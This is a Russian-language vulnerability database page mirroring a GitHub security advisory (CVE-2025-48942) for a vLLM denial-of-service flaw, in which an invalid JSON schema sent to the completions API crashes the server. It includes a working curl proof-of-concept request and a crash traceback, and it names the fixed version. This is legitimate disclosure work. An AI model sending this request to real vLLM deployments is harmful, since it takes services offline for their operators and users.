Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-6qc9-v4r8-22xg

Опубликовано: 28 мая 2025
Источник: github
Github: Прошло ревью
CVSS3: 6.5

Описание

vLLM DOS: Remotely kill vllm over http with invalid JSON schema

Summary

Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server

Details

The following API call (venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}' will provoke a Uncaught exceptions from xgrammer in ./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vllm with invalid json_scema e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vllm crashes

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last): ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core ERROR 03-26 17:25:01 [core.py:340] engine_core.run_busy_loop() ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop ERROR 03-26 17:25:01 [core.py:340] outputs = step_fn() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step ERROR 03-26 17:25:01 [core.py:340] scheduler_output = self.scheduler.schedule() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule ERROR 03-26 17:25:01 [core.py:340] if structured_output_req and structured_output_req.grammar: ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar ERROR 03-26 17:25:01 [core.py:340] completed = self._check_grammar_completion() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion ERROR 03-26 17:25:01 [core.py:340] self._grammar = self._grammar.result(timeout=0.0001) ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result ERROR 03-26 17:25:01 [core.py:340] return self.__get_result() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result ERROR 03-26 17:25:01 [core.py:340] raise self._exception ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run ERROR 03-26 17:25:01 [core.py:340] result = self.fn(*self.args, **self.kwargs) ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar ERROR 03-26 17:25:01 [core.py:340] ctx = self.compiler.compile_json_schema(grammar_spec, ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema ERROR 03-26 17:25:01 [core.py:340] self._handle.compile_json_schema( ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool ERROR 03-26 17:25:01 [core.py:340] ERROR 03-26 17:25:01 [core.py:340] CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.

Fix

Ссылки

Пакеты

Наименование

vllm

pip
Затронутые версииВерсия исправления

>= 0.8.0, < 0.9.0

0.9.0

EPSS

Процентиль: 14%
0.00046
Низкий

6.5 Medium

CVSS3

CVE ID

CVE-2025-48942

Дефекты

CWE-248

Связанные уязвимости

redhat логотип

CVE-2025-48942

CVSS3: 4.3
redhat
20 дней назад

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.

nvd логотип

CVE-2025-48942

CVSS3: 6.5
nvd
19 дней назад

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.

debian логотип

CVE-2025-48942

CVSS3: 6.5
debian
19 дней назад

vLLM is an inference and serving engine for large language models (LLM ...

EPSS

Процентиль: 14%
0.00046
Низкий

6.5 Medium

CVSS3

CVE ID

CVE-2025-48942

Дефекты

CWE-248